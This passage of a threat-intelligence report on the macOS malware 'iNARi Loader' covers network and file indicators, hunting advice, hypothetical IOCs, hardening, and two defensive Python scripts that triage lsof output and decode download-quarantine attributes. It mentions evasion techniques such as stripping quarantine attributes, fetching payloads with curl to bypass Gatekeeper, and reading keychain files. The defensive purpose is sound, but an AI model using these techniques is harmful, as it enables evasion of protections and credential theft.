- Network Traffic Anomalies: Look for connections to IPs or domains that are not typical for the user’s pattern. Since iNARi is private, it might use a unique C2 domain. If known, block or monitor those. In absence of specific domains, look for traffic to hosting providers or cloud storage services at times that correlate with suspected malware activity. Large outbound transfers (if it’s uploading a lot of data) could be a sign.
- Encrypted Traffic on Non-Standard Ports: If iNARi uses a custom protocol, it might not use standard ports. Any outbound connection from a user process on an uncommon port (other than 80/443/5223 etc.) should be investigated. A VNC session, even when encrypted, stands out as a single long-lived connection carrying a steady trickle of screen-update traffic while the console user is idle.
- Command and Control Patterns: If possible, use network sandboxing/detonation – if you have a quarantined sample – to identify its C2 infrastructure (this may not be feasible without a sample; for now, rely on intel sharing from the community on any discovered C2 addresses).
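The socket-level indicators above (a VNC listener, Screen Sharing active, an outbound connection to an external host on an unexpected port) can be checked from a single `sudo lsof -nP -iTCP` listing. The script below is an added example for this report, not tooling from the iNARi analysis. The lsof rows it parses are constructed, with RFC 5737 documentation addresses standing in for external hosts, and the set of expected outbound ports is an assumption to extend for your environment.

```python
import ipaddress
import re
import sys
from typing import Dict, List, Optional

# Outbound ports a user process is expected to reach (assumption: the report names
# 80/443/5223; SSH and mail ports are added here). Extend per environment.
EXPECTED_OUTBOUND_PORTS = {80, 443, 5223, 22, 993, 587, 465}
VNC_PORTS = range(5900, 5910)                     # VNC displays :0 to :9

# lsof -n prints raw addresses, so decide "internal" explicitly. (ipaddress.is_private
# would also treat the RFC 5737 documentation ranges used in the sample as private.)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fe80::/10")]

# COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME   (lsof -nP -iTCP layout)
LINE_RE = re.compile(r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+.*?\bTCP\s+(?P<name>.+)$")
# NAME is "laddr:lport (STATE)" or "laddr:lport->raddr:rport (STATE)"; IPv6 is bracketed.
NAME_RE = re.compile(r"^(?P<laddr>[^\s>]+?):(?P<lport>\d+)"
                     r"(?:->(?P<raddr>[^\s]+?):(?P<rport>\d+))?\s*\((?P<state>\w+)\)$")


def is_external(addr: str) -> bool:
    """True for an address outside the RFC 1918 / loopback / link-local nets."""
    addr = addr.strip("[]")
    if addr in ("*", ""):
        return False
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def parse_lsof_line(line: str) -> Optional[Dict]:
    """Parse one TCP row of lsof output; returns None for the header or non-TCP rows."""
    m = LINE_RE.match(line)
    if not m:
        return None
    n = NAME_RE.match(m.group("name"))
    if not n:
        return None
    return {"cmd": m.group("cmd"), "pid": int(m.group("pid")), "user": m.group("user"),
            "laddr": n.group("laddr").strip("[]"), "lport": int(n.group("lport")),
            "raddr": (n.group("raddr") or "").strip("[]"),
            "rport": int(n.group("rport")) if n.group("rport") else None,
            "state": n.group("state")}


def triage_connections(lsof_output: str) -> List[Dict]:
    """Apply the report's remote-access and C2 heuristics to `sudo lsof -nP -iTCP` output."""
    findings: List[Dict] = []
    for line in lsof_output.splitlines():
        rec = parse_lsof_line(line)
        if rec is None:
            continue
        hits = []
        # 1. Something accepting connections on a VNC display port.
        if rec["state"] == "LISTEN" and rec["lport"] in VNC_PORTS:
            hits.append(("vnc_listener", f"listening on VNC port {rec['lport']}"))
        # 2. Apple's Screen Sharing daemon with a live session (lsof truncates
        #    COMMAND to 9 characters unless run with +c 0, hence the prefix test).
        if rec["cmd"].startswith("screensha") and rec["state"] == "ESTABLISHED":
            hits.append(("screen_sharing_session", f"Screen Sharing session with {rec['raddr']}"))
        # 3. Established connection to an external host on a port nobody expected,
        #    unless the row was already explained by rule 2.
        if (not hits and rec["state"] == "ESTABLISHED" and is_external(rec["raddr"])
                and rec["rport"] not in EXPECTED_OUTBOUND_PORTS):
            hits.append(("unusual_outbound_port", f"{rec['raddr']}:{rec['rport']}"))
        for rule, detail in hits:
            findings.append({"rule": rule, "cmd": rec["cmd"], "pid": rec["pid"], "detail": detail})
    return findings


# Constructed sample (not a capture from a real infection). 203.0.113.x and
# 198.51.100.x are RFC 5737 documentation addresses standing in for external hosts.
SAMPLE_LSOF = """\
COMMAND     PID   USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
rapportd    480  alice    4u  IPv4 0x6f3a1c2b0e4d5a61      0t0  TCP *:49152 (LISTEN)
Safari     1201  alice   21u  IPv4 0x6f3a1c2b0e4d5b72      0t0  TCP 192.168.1.20:52010->203.0.113.10:443 (ESTABLISHED)
agentd     2048  alice    3u  IPv4 0x6f3a1c2b0e4d5c83      0t0  TCP *:5901 (LISTEN)
agentd     2048  alice    4u  IPv4 0x6f3a1c2b0e4d5d94      0t0  TCP 192.168.1.20:52077->203.0.113.45:8443 (ESTABLISHED)
screensha   310  alice    8u  IPv4 0x6f3a1c2b0e4d5ea5      0t0  TCP 192.168.1.20:5900->198.51.100.7:60123 (ESTABLISHED)
"""

if __name__ == "__main__":
    # Live use on a Mac: sudo lsof -nP -iTCP | python3 triage_connections.py
    data = SAMPLE_LSOF if sys.stdin.isatty() else sys.stdin.read()
    for f in triage_connections(data):
        print(f"[{f['rule']}] {f['cmd']} (pid {f['pid']}): {f['detail']}")
```

On the sample, `rapportd` (a normal Apple daemon on a high port) and Safari on 443 pass, while the `agentd` listener on 5901, its connection to an external host on 8443, and the active Screen Sharing session are each reported. Run the triage repeatedly and diff the results; a one-off `lsof` snapshot misses a session the attacker opens only when the user is away.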
- File System Artifacts: Even if iNARi strives to be fileless, some artifacts may be left:
- Malware Binary or Scripts: Search for any binaries with unusual names or locations. The malware might install components in `~/Library/Application Support/<some folder>` or a disguised system folder. If the name "inari" is used internally, a simple search for that string on disk or in memory could find something (attackers sometimes leave project names in strings). However, given its stealth, it may use generic names like "agentd" or mimic Apple processes to hide; checking a binary's signature with `codesign -dv --verbose=4 <path>` quickly separates a genuine Apple or notarized binary from an impostor.
- Logs of Execution: The macOS Unified Log might record the execution of processes. Using Console or `log show`, filter for the timeframe of suspicion and look for messages from unknown processes or crash reports (if the malware failed at some point). Crash logs of unknown apps under `~/Library/Logs/DiagnosticReports` can be a clue.
- Endpoint Protection Alerts: Ensure that any available endpoint security tool on Macs (XProtect, MRT, or third-party AV/EDR) is updated. Apple’s XProtect (YARA-based signatures) might eventually get rules for iNARi once samples are obtained by Apple – keep macOS updated so you receive these silent XProtect updates. Some EDRs may generically detect behaviors like “suspicious script launches” or “attempt to access keychain” – these should be investigated, not dismissed, in the context of this new threat.
- Threat Hunting Recommendations:
To proactively hunt for iNARi or similar malware in your environment, consider the following:
- YARA or Sigma Rules: Develop hunting YARA rules for Mac malware that search for telltale strings in memory or files (for example, references to VNC functions, or use of particular macOS APIs for credential prompts). Also use Sigma rules over logs to detect events such as a process being granted Accessibility access in TCC (which malware may need in order to simulate keystrokes and mouse input).
- Monitor for New Services or Daemons: If iNARi installs a persistent service, `launchctl list` (for the current user) and `sudo launchctl list` (system domain) will show it. Periodically enumerate loaded LaunchAgents/Daemons and compare against an allowlist of known-good services in your fleet.
- User Reports: Encourage users to report any strange system behavior. Because macOS malware is still uncommon, users might notice odd signs (a sudden password prompt that disappears, an unknown app in the Applications folder, etc.). User reports can often lead to early detection.
- Mac Forensics: If an endpoint is suspected of compromise, perform a forensic analysis. Dump memory (if feasible) to search for hooks or suspicious network sockets. Check the quarantine attributes on downloaded files: `xattr -l <file>` shows `com.apple.quarantine` (the downloading application and a timestamp) and `com.apple.metadata:kMDItemWhereFroms` (the origin URL), so you can see whether the DMG the user ran came from a sketchy URL. A file the user says they downloaded that carries no quarantine attribute is notable in itself: it arrived through a path that does not set one (for example `curl` in Terminal) or the attribute was stripped with `xattr -d`, which is exactly how Gatekeeper gets sidestepped. Analyze any suspicious installer with Objective-See's tools (KnockKnock, BlockBlock) to see what persistence it set up, and inspect its linked libraries (`otool -L <binary>`) for dynamic library hijacking.
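The quarantine check in the forensics item above is mechanical enough to script. The following Python is an added example for this report, not code from the iNARi analysis or from Objective-See. It decodes the `com.apple.quarantine` string and the `kMDItemWhereFroms` binary plist and says what each absence means. The sample attribute values are constructed (a Safari download on 2023-07-18 with an invented event UUID; 203.0.113.99 is an RFC 5737 documentation address), the list of browser agent names is an assumption, and `read_xattrs` shells out to `xattr(1)` for use on a live Mac.

```python
import ipaddress
import plistlib
import subprocess
from datetime import datetime, timezone
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Agents that normally write quarantine attributes (assumption; extend for your fleet).
KNOWN_BROWSERS = {"Safari", "Chrome", "Google Chrome", "Firefox", "Microsoft Edge", "Brave Browser"}


def parse_quarantine(value: str) -> Dict:
    """Decode com.apple.quarantine, whose text form is
    'flags;hexUnixTime;agentName;eventUUID' (the UUID may be missing)."""
    parts = value.strip().split(";")
    if len(parts) < 3:
        raise ValueError(f"unexpected quarantine value: {value!r}")
    return {
        "flags": int(parts[0], 16),                    # opaque LaunchServices flag bits
        "downloaded_at": datetime.fromtimestamp(int(parts[1], 16), tz=timezone.utc),
        "agent": parts[2],
        "event_uuid": parts[3] if len(parts) > 3 else "",
    }


def parse_wherefroms(raw: bytes) -> List[str]:
    """Decode com.apple.metadata:kMDItemWhereFroms: a binary plist holding an array
    of [download URL, referrer URL]; the referrer is often absent."""
    value = plistlib.loads(raw)
    return [str(u) for u in value] if isinstance(value, list) else []


def assess_download(quarantine: Optional[str], wherefroms: Optional[bytes]) -> List[str]:
    """Reasons the provenance of a downloaded file deserves a second look.
    Returns an empty list for a browser download over HTTPS from a named host."""
    reasons: List[str] = []
    if quarantine is None:
        reasons.append("no com.apple.quarantine attribute: fetched by a tool that does not "
                       "set one (e.g. curl in Terminal) or stripped with xattr -d")
    else:
        q = parse_quarantine(quarantine)
        if q["agent"] not in KNOWN_BROWSERS:
            reasons.append(f"downloaded by non-browser agent {q['agent']!r}")
    urls = parse_wherefroms(wherefroms) if wherefroms else []
    if not urls:
        reasons.append("no kMDItemWhereFroms attribute: origin URL unavailable")
    for url in urls:
        parts = urlsplit(url)
        if parts.scheme == "http":
            reasons.append(f"plain-HTTP origin: {url}")
        try:
            ipaddress.ip_address(parts.hostname or "")
            reasons.append(f"origin is a raw IP address: {url}")
        except ValueError:
            pass
    return reasons


def read_xattrs(path: str) -> List[str]:
    """On a Mac, pull both attributes with the xattr(1) tool and assess them."""
    def get(attr: str, as_hex: bool) -> Optional[str]:
        cmd = ["xattr", "-px" if as_hex else "-p", attr, path]
        r = subprocess.run(cmd, capture_output=True, text=True)
        return r.stdout if r.returncode == 0 else None      # non-zero: attribute absent
    q = get("com.apple.quarantine", as_hex=False)
    w = get("com.apple.metadata:kMDItemWhereFroms", as_hex=True)
    return assess_download(q, bytes.fromhex(w) if w else None)


# Constructed samples (no real iNARi artifact is public). The quarantine string is what
# `xattr -p com.apple.quarantine Installer.dmg` prints for a Safari download made on
# 2023-07-18; the UUID is invented. The WhereFroms bytes are built here as the binary
# plist that `xattr -px` would dump in hex.
SAMPLE_QUARANTINE = "0083;64b6b1b1;Safari;1A2B3C4D-5E6F-4A7B-8C9D-0E1F2A3B4C5D"
SAMPLE_WHEREFROMS_SKETCHY = plistlib.dumps(
    ["http://203.0.113.99/downloads/macOSInstaller.dmg"], fmt=plistlib.FMT_BINARY)
SAMPLE_WHEREFROMS_CLEAN = plistlib.dumps(
    ["https://example.com/releases/App.dmg", "https://example.com/"], fmt=plistlib.FMT_BINARY)

if __name__ == "__main__":
    print(parse_quarantine(SAMPLE_QUARANTINE))
    for reason in assess_download(SAMPLE_QUARANTINE, SAMPLE_WHEREFROMS_SKETCHY):
        print(" -", reason)
```

The timestamp and agent from `com.apple.quarantine` give you the download moment and the application that wrote it, which is what you correlate against the Unified Log and the user's account of events; the origin URL comes from `kMDItemWhereFroms`, not from the quarantine string itself.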
- Indicators of Compromise (Preliminary):
Since concrete IOCs are not available in public sources, the following are hypothetical or generic indicators related to iNARi's described behavior:
- Filenames or bundle names like "FinderFontsUpdater", "macOSInstaller", or other innocuous-sounding names that are not part of the default OS, appearing in LaunchAgents or running processes.
- A persistent LaunchAgent plist containing a program argument referencing “/private/var/tmp” or another unusual path (malware often drops payloads in tmp or hidden directories).
- Outbound connections to IP addresses with no domain name (raw IP C2) over high-numbered ports.
- The presence of a VNC server process. If the attacker uses a stock VNC server, a process like `OSXvnc` or `vine-server` could be present. If using Apple's Screen Sharing, the `screensharingd` process might be running under a user context unexpectedly.
- Any signs of Keychain access: look at `~/Library/Keychains/`. Malware might attempt to read the keychain database files directly if it has captured the user's password (the login keychain is protected by it). Unusual file access to `*.keychain-db` files could surface in `securityd` log messages.
- Mitigation and Defense: In addition to hunting and detection, now is the time to harden defenses:
- Ensure all Mac endpoints have the latest OS updates (which improve built-in security).
- Enforce the use of security features: Gatekeeper (don’t allow users to easily run apps from unidentified developers), System Integrity Protection (SIP) on (prevents even root from tampering certain locations), and FileVault (in case devices are stolen, though not directly relevant to remote malware). Apple’s protections like Gatekeeper and Notarization can be bypassed if users are tricked into running Terminal commands, so user training is key.
- Deploy Mac-compatible endpoint protection that can catch known malicious behaviors (for example, tools that flag when an app tries to record the screen or keystrokes, or when it tries to persist itself).
- Use network controls to egress filter traffic from Macs. If your Macs typically don’t need to talk to arbitrary IPs, consider restricting outgoing connections or at least monitoring them with an IDS/IPS for known malicious patterns.
- Incorporate macOS threats into your incident response playbooks. Many organizations still primarily focus on Windows. Ensure your IR team knows how to acquire logs and triage a Mac system. iNARi’s arrival means the next incident could very well involve a Mac compromise.
In conclusion, iNARi Loader represents a potent new threat to macOS environments. Security teams should treat this as a wake-up call to expand monitoring and response to include Macs as first-class targets. While specific indicators will emerge as samples are analyzed, the combination of iNARi’s advertised features gives us enough to start hardening systems and watching for suspicious behaviors immediately. By staying vigilant and applying the above hunting techniques, defenders can improve their chances of detecting iNARi or similar malware before serious damage is done.
Sources: The information in this report is based on open-source intelligence and reporting from April 2025, including dark web forum postings and security research analyses
(macOS Users Beware! Hackers Allegedly Offering Full System Control Malware for Rent – Cyber Security News)
(Hackers have put malware for macOS up for sale. Prices range from 5 to 10 thousand USD per month – Kapitan Hack)